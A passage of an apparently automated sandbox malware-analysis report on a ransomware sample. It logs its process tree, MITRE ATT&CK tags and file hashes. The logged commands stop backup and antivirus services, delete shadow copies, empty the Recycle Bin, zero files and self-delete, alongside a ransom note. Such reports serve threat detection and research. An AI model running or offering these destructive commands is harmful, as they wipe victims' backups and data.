C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
- System Location Discovery: System Language Discovery
PID:2248 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
- System Location Discovery: System Language Discovery
PID:2680
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:2724
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
- System Location Discovery: System Language Discovery
PID:2628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
- System Location Discovery: System Language Discovery
PID:2456
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:2672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
- System Location Discovery: System Language Discovery
PID:2072
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:1516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
- System Location Discovery: System Language Discovery
PID:2092
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
- System Location Discovery: System Language Discovery
PID:444 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
- System Location Discovery: System Language Discovery
PID:2224
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
- System Location Discovery: System Language Discovery
PID:2804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:1604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
- System Location Discovery: System Language Discovery
PID:1100 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
- System Location Discovery: System Language Discovery
PID:2808
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
- System Location Discovery: System Language Discovery
PID:1796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
- System Location Discovery: System Language Discovery
PID:1568
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
- System Location Discovery: System Language Discovery
PID:2784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:628
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:1588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
- System Location Discovery: System Language Discovery
PID:2904 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
- System Location Discovery: System Language Discovery
PID:2720 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
- System Location Discovery: System Language Discovery
PID:2076
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
- System Location Discovery: System Language Discovery
PID:1916
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:2144 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:912
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:1096 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
- System Location Discovery: System Language Discovery
PID:696 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
- System Location Discovery: System Language Discovery
PID:1820
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3040
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2036
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:2120
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:496
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1492
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1624
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2340
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1020
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2096
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1392
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1504
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1316
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1736
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:892
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1252
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1584
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1680
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA979.bat2⤵
- System Location Discovery: System Language Discovery
PID:932
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:1268
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1716 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2572
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
- System Location Discovery: System Language Discovery
PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:496 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
- System Location Discovery: System Language Discovery
PID:1852
-
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2432
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2952
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\RestoreSave.avi.locked1⤵
- Modifies registry class
PID:1536
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2596
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5c41⤵
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:956
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b1af4c27783d087ec88bf99e825e62f9
SHA119740e76333d5ddfd1926c29e684522e8b04c8af
SHA256923d1e68134e3c2ff5a8a8816ccbd70f8143a9540cbff8c8d02abdee9dbb9f52
SHA51296906b045eabdf349da92720f71c4258a7263dd075b8b724647c429f40ac5324fc32bb93eeaa985e3c4341a256700a0fa75a17b499d39a450d0c3a2c35d4076d